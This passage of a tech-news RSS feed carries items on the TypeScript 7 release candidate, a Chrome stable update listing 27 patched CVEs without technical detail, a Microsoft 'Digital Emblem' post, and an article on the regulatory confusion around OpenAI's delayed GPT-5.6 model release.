<p><a href="https://www.infoworld.com/article/3849654/typescript-gets-go-faster-stripes.html">It has been a year or so</a> since Microsoft announced its plans to move <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a> to a new, native runtime based on the <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html" data-type="link" data-id="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go language</a>. Those first releases were unfinished (you had to compile them yourself) but showed promise, getting close to the expected 10x speed-up. That year has been one of steady progress, with <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/">Microsoft recently announcing the delivery of a release candidate build</a>.</p>



<p>This release candidate is ready for use. It installs from npm like previous versions, and like earlier builds it works in much the same way as previous versions of TypeScript, checking types in your code, compiling it to run on ECMAScript-compliant JavaScript engines, and running just about anywhere. In addition, a native preview of the TypeScript language server for <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> is available to help you write new TypeScript code and guide you through updating existing applications to the new language features.</p>



<p>All you need to do is enable the <a href="https://marketplace.visualstudio.com/items?itemName=TypeScriptTeam.native-preview" data-type="link" data-id="https://marketplace.visualstudio.com/items?itemName=TypeScriptTeam.native-preview">TypeScript 7 extension</a> through the Visual Studio command palette and start coding. There’s a lot of work going on to get the new tooling ready for the final release of TypeScript 7, and new versions of the language server are being released almost daily. It’s certainly popular, too, with nearly half a million downloads at the time of writing.</p>



<h2 class="wp-block-heading">What makes TypeScript 7 so much faster?</h2>



<p>So how is this new TypeScript so much faster? Key to the improvements is a shift to a new native compiler built in Go. This has allowed the team to change how it operates, adding parallelization where possible. In some cases, this isn’t easy, such as when type checking large codebases split across many files.</p>



<p>Here TypeScript spawns a small number of checker workers that run across your codebase. They work independently, so can duplicate the work — though the output will be the same. You can choose your own number of checkers, but the more you use, the more memory and CPU will be required.</p>



<p>Large monorepos with many projects require a similar approach with independent builder workers. You’ll need to balance this with the number of checkers in use, as this can cause significant resource issues.</p>



<p>There are some significant language and configuration changes from TypeScript 5 (TypeScript 6 has the same changes, which makes it a useful tool for experimenting with migrations). It’s well worth reading the release candidate documentation to understand how these will affect your code, as well as using the TypeScript 7 extension for Visual Studio Code to identify where you need to make changes.</p>



<h2 class="wp-block-heading">Working with users to build language tools</h2>



<p>One important aspect to the development of TypeScript 7 has been collaboration with existing users of the language and its tooling, as well as using the existing suite of TypeScript test tools that have been used to evaluate other versions. As this update is primarily a port of existing code, rather than a bottom-up rewrite, the underlying language semantics and structure are the same as those used in the original JavaScript codebase, ensuring that code will quickly port from old to new versions.</p>



<p>A major internal collaborator was the Visual Studio Code team, who have been using TypeScript to develop the familiar cross-platform development tool. It’s an important partnership between tool and language, as VS Code is a key TypeScript development tool, hosting TypeScript’s language server and using its compiler to provide debugging and code completion features.</p>



<p>The <a href="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7" data-type="link" data-id="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7">VS Code team published a long blog post</a> detailing how it has been working with the Go-based TypeScript. The team is both helping to develop the language and beginning the process of moving its codebase to the newer, faster, native platform.</p>



<p>How the VS Code team migrated is a useful case study, one that can help you move your TypeScript development more efficiently and with minimal risk. The team began working with extensions, using daily builds of TypeScript to ensure that bugs and issues could be reported as they occurred and would only have a limited impact as fixes could be rolled out quickly. At the same time, the VS Code team began using a preview version of the TypeScript 7 extension for VS Code, which was being built around the new compiler in parallel with its development.</p>



<h2 class="wp-block-heading">Bridging development with TypeScript 6</h2>



<p>The development of <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-6-0/" data-type="link" data-id="https://devblogs.microsoft.com/typescript/announcing-typescript-6-0/">TypeScript 6 as a bridge between TypeScript 5 and TypeScript 7</a> allowed the VS Code team to transition to code that targeted a newer version of ECMAScript and provided more powerful checks. By moving code from TypeScript 5 to TypeScript 6, developers could validate it with what would become TypeScript 7 language features and get speed and performance boosts while doing so (though nowhere near what TypeScript 7 promised). By completing this first migration of the VS Code codebase, it was possible for developers to be confident that they were ready to shift to the Go-based version when it shipped.</p>



<p>The parallel development of the new language server and extension ensured that by late 2025 it was possible for VS Code development to shift to TypeScript 7, with TypeScript 6 used as a fallback if there were any issues. Those cases could then be reported back to the TypeScript team and used to prioritize development.</p>



<p>As the platform evolved, the use cases for the VS Code team changed. By early 2026 TypeScript 7 was stable and nearly feature-complete, so the team began to use it to build all of their own built-in extensions. This allowed them to rethink their toolchain, changing the bundler from webpack to the one built into esbuild, giving them another speed up. Once that process was tested and working, they could switch all development to TypeScript 7.</p>



<p>Having such a big project take on TypeScript 7 early reaped big rewards, as the resulting virtuous cycle allowed both VS Code and TypeScript to move forward together, fixing issues as they arose and providing valuable feedback. The results speak for themselves. Type checking the entire VS Code codebase is now 7x faster, with most extensions checked in under a second. The only exception was <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, which is almost as big as the editor itself, which type checked in 2.5 seconds.</p>



<p>Compilation has been sped up, dropping from 80 seconds to around 20 seconds. This may not seem a lot, but when you’re compiling and rebuilding and debugging, each change in your code now takes a lot less time. That improves developer productivity and ensures they stay in flow, rather than switching away to check email or Teams each time they start a new build. The same goes for using the language server, where loading the entire project (necessary for error detection and refactoring) now takes 10 seconds rather than a minute.</p>



<p>Lots of little time savings like this add up across a big project and a large team, helping developers stay focused and able to solve problems more effectively. The VS Code blog post notes that it cuts down on coffee runs, which take longer than the load or build that inspire a quick cuppa!</p>



<h2 class="wp-block-heading">Getting ready for TypeScript 7 in your build pipeline</h2>



<p>Microsoft is quick to point out that, while the TypeScript 7.0 release will be production ready, TypeScript 7 won’t have a full programmatic API until the release of TypeScript 7.1. As this won’t be for some time, Microsoft is providing <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/#running-side-by-side-with-typescript-6.0" data-type="link" data-id="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/#running-side-by-side-with-typescript-6.0">a way to run TypeScript 7 side-by-side with TypeScript 6</a>.</p>



<p>Installing the <code>@typescript/typescript6</code> compatibility package alongside TypeScript 7 adds a new executable, <code>tsc6</code>, that allows you to modify code that uses the TypeScript 5 API to run using TypeScript 6, by renaming the calls to <code>tsc</code> in your scripts to <code>tsc6</code>. This should allow you to keep building to the latest releases at the same time as starting to experiment with using the new runtime.</p>



<p>It’s not a perfect fix. You do need to do some work to implement npm aliases that allow linters and other low-level tools to work with both versions. You can also provide two different dependencies in your package.json to allow TypeScript 6 (<code>tsc6</code>) and TypeScript 7 (<code>tsc</code>) to run side-by-side. The result is a way to help migrate TypeScript code to the newer platform, delivering more efficient code that runs on a more modern ECMAScript in the meantime.</p>



<p>TypeScript 7 will be a big upgrade, though it has taken surprisingly little time to deliver. With users like the Visual Studio Code team already building on the new release, it’s clear that beginning your own migration should be easier than you might have thought.</p>



<p>The final release is due sometime in July 2026. If you haven’t started looking at TypeScript 7, now is the time to start.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Making humanitarian protection visible in cyberspace: The promise of the Digital Emblem]]></title>
<description><![CDATA[In armed conflict, a simple symbol can save lives. The Red Cross, Red Crescent, and Red Crystal emblems signal that those providing medical care and humanitarian assistance must be protected.  In cyberspace, there is not yet a widely adopted equivalent, even as hospitals, humanitarian organizatio...]]></description>
<link>https://tsecurity.de/de/3656202/it-security-nachrichten/making-humanitarian-protection-visible-in-cyberspace-the-promise-of-the-digital-emblem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656202/it-security-nachrichten/making-humanitarian-protection-visible-in-cyberspace-the-promise-of-the-digital-emblem/</guid>
<pubDate>Thu, 09 Jul 2026 09:08:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In armed conflict, a simple symbol can save lives. The Red Cross, Red Crescent, and Red Crystal emblems signal that those providing medical care and humanitarian assistance must be protected.  In cyberspace, there is not yet a widely adopted equivalent, even as hospitals, humanitarian organizations, and relief operations increasingly rely on digital systems to deliver care, coordinate assistance,...</p>
<p>The post <a href="https://blogs.microsoft.com/on-the-issues/2026/07/09/making-humanitarian-protection-visible-in-cyberspace-the-promise-of-the-digital-emblem/">Making humanitarian protection visible in cyberspace: The promise of the Digital Emblem</a> appeared first on <a href="https://blogs.microsoft.com/on-the-issues">Microsoft On the Issues</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.114/.115 for Windows and Mac and 150.0.7871.114 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept rest...]]></description>
<link>https://tsecurity.de/de/3655665/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655665/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Thu, 09 Jul 2026 02:37:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.114/.115 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.114 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.101..150.0.7871.115?pretty=fuller&amp;n=10000">Log</a></span></p><p><span face="Arial, sans-serif">Security Fixes and Rewards</span></p><p><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><p dir="ltr"><span face="Arial,sans-serif"><br></span></p><p dir="ltr"><span face="Arial,sans-serif">This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:1-M150"><span face="Arial,sans-serif">27</span></a><span face="Arial,sans-serif"> security fixes. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span face="Arial,sans-serif">Chrome Security Page</span></a><span face="Arial,sans-serif"> for more information.</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/518006275"><span face="Arial, sans-serif">518006275</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> Critical </span><span face="Arial, sans-serif">CVE-2026-15112: Use after free in Ozone. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-29</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/524045160"><span face="Arial, sans-serif">524045160</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> Critical </span><span face="Arial, sans-serif">CVE-2026-15129: Use after free in Views. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-15</span></p><p dir="ltr"><span face="Arial, sans-serif">[$500][</span><a href="https://issues.chromium.org/issues/527385397"><span face="Arial, sans-serif">527385397</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15132: Uninitialized Use in V8. </span><span face="Arial, sans-serif">Reported by Pierre Langlois from Arm on 2026-06-24</span></p><p dir="ltr"><span face="Arial, sans-serif">[$500][</span><a href="https://issues.chromium.org/issues/527406824"><span face="Arial, sans-serif">527406824</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15133: Use after free in InterestGroups. </span><span face="Arial, sans-serif">Reported by Jihyeon Jeong (Compsec Lab, Seoul National University / Research Intern) on </span><span face="Arial, sans-serif">2026-06-24</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/515443146"><span face="Arial, sans-serif">515443146</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15108: Integer overflow in Extensions API. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-21</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/516899138"><span face="Arial, sans-serif">516899138</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15109: Uninitialized Use in ANGLE. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-26</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/516948486"><span face="Arial, sans-serif">516948486</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15110: Use after free in Extensions. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-27</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/517508651"><span face="Arial, sans-serif">517508651</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15111: Use after free in Views. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-28</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/520540744"><span face="Arial, sans-serif">520540744</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15113: Use after free in Autofill. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-05</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/520565945"><span face="Arial, sans-serif">520565945</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15114: Out of bounds read and write in Codecs. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-06</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/520576676"><span face="Arial, sans-serif">520576676</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15115: Insufficient validation of untrusted input in WebAppInstalls. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-06</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/522092013"><span face="Arial, sans-serif">522092013</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15116: Use after free in Actor. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-10</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/522568496"><span face="Arial, sans-serif">522568496</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15117: Use after free in Payments. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-11</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523238265"><span face="Arial, sans-serif">523238265</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15118: Use after free in Input. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-12</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523505418"><span face="Arial, sans-serif">523505418</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15119: Inappropriate implementation in GetUserMedia. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-13</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523609602"><span face="Arial, sans-serif">523609602</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15120: Use after free in Core. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-13</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523712556"><span face="Arial, sans-serif">523712556</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15121: Use after free in WebRTC. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523717219"><span face="Arial, sans-serif">523717219</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15122: Insufficient validation of untrusted input in Codecs. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523729553"><span face="Arial, sans-serif">523729553</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15123: Insufficient data validation in DOM. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523735038"><span face="Arial, sans-serif">523735038</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15124: Insufficient policy enforcement in Passwords. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523737685"><span face="Arial, sans-serif">523737685</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15125: Inappropriate implementation in Forms. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523748081"><span face="Arial, sans-serif">523748081</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15126: Use after free in Forms. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523752265"><span face="Arial, sans-serif">523752265</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15127: Inappropriate implementation in WebGL. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/523756329"><span face="Arial, sans-serif">523756329</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15128: Inappropriate implementation in Forms. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-14</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/526541544"><span face="Arial, sans-serif">526541544</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-15130: Insufficient policy enforcement in Navigation. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-22</span></p><p dir="ltr"><span face="Arial, sans-serif">[$2000][</span><a href="https://issues.chromium.org/issues/503553615"><span face="Arial, sans-serif">503553615</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> Medium </span><span face="Arial, sans-serif">CVE-2026-15107: Use after free in IndexedDB. </span><span face="Arial, sans-serif">Reported by zh1x1an1221 of Ant Group Tianqiong Security Lab on 2026-04-17</span></p><p dir="ltr"><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/526542464"><span face="Arial, sans-serif">526542464</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> Medium </span><span face="Arial, sans-serif">CVE-2026-15131: Insufficient data validation in Navigation. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-22</span></p><p dir="ltr"><span face="Arial, sans-serif"><br></span></p><p dir="ltr"><span face="Arial, sans-serif">We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><p dir="ltr"><span face="Arial, sans-serif"><br></span></p><p dir="ltr"><span face="Arial, sans-serif">Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span face="Arial, sans-serif">, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span face="Arial, sans-serif">, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span face="Arial, sans-serif">.</span></p><div><br></div><div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to release delayed models Thursday amidst a sea of regulatory confusion]]></title>
<description><![CDATA[As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.



Initially, the US gov...]]></description>
<link>https://tsecurity.de/de/3655253/ai-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655253/ai-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</guid>
<pubDate>Wed, 08 Jul 2026 21:03:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.</p>



<p>Initially, the US government said that it was asking OpenAI to <a href="https://www.infoworld.com/article/4190089/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model-2.html" target="_blank">limit access to its top models</a>, including the three releasing Thursday, to a short list of companies. OpenAI seemingly agreed and held back their general availability.</p>



<p>But on Wednesday, OpenAI reversed its position, with <a href="https://x.com/OpenAI/status/2074704958419792299?s=20" target="_blank" rel="noreferrer noopener">a statement on X</a> saying simply: “GPT-5.6 Sol, along with Terra and Luna, will launch publicly this Thursday. We’re expanding preview access globally now.” No details were released about the extent of the expansion.</p>



<p>Then the White House issued a statement, a copy of which it emailed to <em>InfoWorld</em>, saying that the US government “did not give OpenAI a ‘green light,’ approval or clearance to release its models. No such permission is required or granted. The Administration does not provide approvals for private companies to release AI models – decisions on timing and scope of releases rest entirely with the companies.”</p>



<p>The statement then quoted from the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/" target="_blank" rel="noreferrer noopener">June 2 White House executive order</a> that said, “nothing in this section shall be construed to authorize the creation of a mandatory governmental licensing, preclearance, or permitting requirement for the development, publication, release, or distribution of new AI models, including frontier models.” It also said, “any testing or meetings with government experts is voluntary. Participation is not required to release a model.”</p>



<p>Yet last month, the US Commerce Department weighed in <a href="https://www.cio.com/article/4186429/anthropic-fable-dispute-suggests-export-no-longer-means-what-it-used-to.html" target="_blank">on how Anthropic’s models can be distributed</a>. </p>



<h2 class="wp-block-heading">The ‘worst of both worlds’</h2>



<p><a href="https://www.linkedin.com/in/lewiscarhart/" target="_blank" rel="noreferrer noopener">Lewis Carhart</a>, CEO of software development firm Comp AI, said the statement is frustrating for IT executives on multiple fronts. </p>



<p>“Think about what that [White House statement] means. OpenAI stationed engineers in Washington for weeks, submitted to government testing, staggered its launch at the government’s request. And the official position is that none of that was required,” Carhart said. “We now have a de facto licensing regime that legally doesn’t exist. There’s no statute, no appeal process, no published criteria. Just [the US Department of] Commerce deciding model by model what ships and when.”</p>



<p>That’s the worst of both worlds, he noted: “All the friction of regulation with none of the predictability. Compliance people have a name for this – it’s an audit with no framework. And the precedent is now locked in for both frontier labs: if you build at the frontier, your launch calendar runs through Washington whether the law says so or not.”</p>



<p>Carhart argued that this regulatory reality should be of extreme concern to enterprise IT executives, given it indicates that model availability is now “a regulatory variable” not driven by the vendor roadmap.</p>



<p>“Anthropic’s most advanced models disappeared from the market for three weeks in June. It was not because of an outage, not because of a pricing change. It was because of an export control directive,” he pointed out. “If your AI architecture assumes the model you deployed today is available tomorrow, that assumption is now demonstrably false. Multi-model resilience just went from nice to have to a board-level risk item.”</p>



<p>It also offers an opportunity, given that a model that cleared government security testing is a model that auditors and boards sign off on faster. “Government review is quietly becoming a procurement asset,” he observed. “The CIOs who win here are the ones who treat ‘regulatory posture of the model itself’ as a line item in vendor risk assessments – most risk teams are still only looking at the provider’s SOC 2 attestation.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, agreed with Carhart and described the overall back-and-forth as “a bit of pageantry. OpenAI needs its model to look as powerful, potentially dangerous, as Anthropic’s so it can be a contender to be at the absolute frontier. It also helps to burnish OpenAI’s PR efforts to look more responsible than it has in the past.”</p>



<p>Furthermore, he added, “tech CEOs are acutely aware that flattery towards this administration could keep regulators or the threat of regulation at bay.”</p>



<h2 class="wp-block-heading">Criteria not clear</h2>



<p><a href="https://www.infotech.com/profiles/brian-jackson" target="_blank" rel="noreferrer noopener">Brian Jackson</a>, a principal research director at Info-Tech Research Group, echoed the political concerns. </p>



<p>“What’s still not clear is the actual criteria being used to deem the models safe for release. The government has said that it’s concerned about cybersecurity risk as well as the risk of AI being used to develop biological weapons,” he said. “But so long as the actual release criteria lack transparency, there will be some perception that the evaluation could be politically motivated.”</p>



<p>Jackson said that one, presumably unintended, result of the US government’s efforts to control AI rollouts is that it is making companies look far more seriously at using non-US vendors for AI strategies. </p>



<p>“Organizations are looking for alternatives to the private US-based cloud-delivered frontier models. That’s so they can maintain control over their AI supply chain,” he said. “Chinese open source models are one option that’s available, but there are other options too, from Canada and Europe. Companies can either set up AI access through other APIs not connected to US-based AI providers, or download open-source models to run locally.”</p>



<p>He noted that the added US regulatory risk means that some organizations will avoid becoming entrenched within OpenAI’s and Anthropic’s interfaces, where there’s no option to swap out the LLMs for an alternative.</p>



<h2 class="wp-block-heading">Impacts enterprise AI strategy</h2>



<p><a href="https://zenity.io/authors/rock-lambros" target="_blank" rel="noreferrer noopener">Rock Lambros</a>, director of AI standards and governance at AI agent vendor Zenity, shared the frustration that little to no actionable compliance data is being released. </p>



<p>“Nobody outside a closed room can tell you what standard [the model] passed because it was never written down. For two weeks, [US government officials] kept a model out of defenders’ hands that’s better at guarding your network than breaking into anyone else’s,” Lambros said. “Call that a security review if it helps you sleep better. But it reads to me like a bouncer working a velvet rope nobody hired him to run, waving people through today because he’s in a better mood than he was a couple of weeks ago.”</p>



<p>This unpredictability is likely to have impacts on AI strategy far beyond traditional compliance concerns, Lambros said.</p>



<p>“We’ve built way too much operational reliance on these models to hang it on a review with no rulebook,” he said, pointing out that hospitals, pipelines, banks and water utilities are relying on frontier AI whose availability “can swing from ‘on’ to ‘off’ to ‘on’ with no notice, no appeal, and no published standard behind any of it.”</p>



<p>“You can’t run critical infrastructure on a tool that runs fine Friday and is offline by Monday because an approval process nobody can see reached a verdict nobody can predict,” Lambros said. “That is a supply chain risk with a government hand on the switch, and almost nobody has priced it into a continuity plan.”</p>



<p>To protect themselves, companies need to adjust their expectations. “Treat model availability like any single point of failure you don’t own by standing up a fallback you’ve tested, getting a continuity clause in your contract, and drilling for the blackout, because ‘the government backed off this time’ is not a plan,” he advised.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to release delayed models Thursday amidst a sea of regulatory confusion]]></title>
<description><![CDATA[As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.



Initially, the US gov...]]></description>
<link>https://tsecurity.de/de/3655243/it-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655243/it-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</guid>
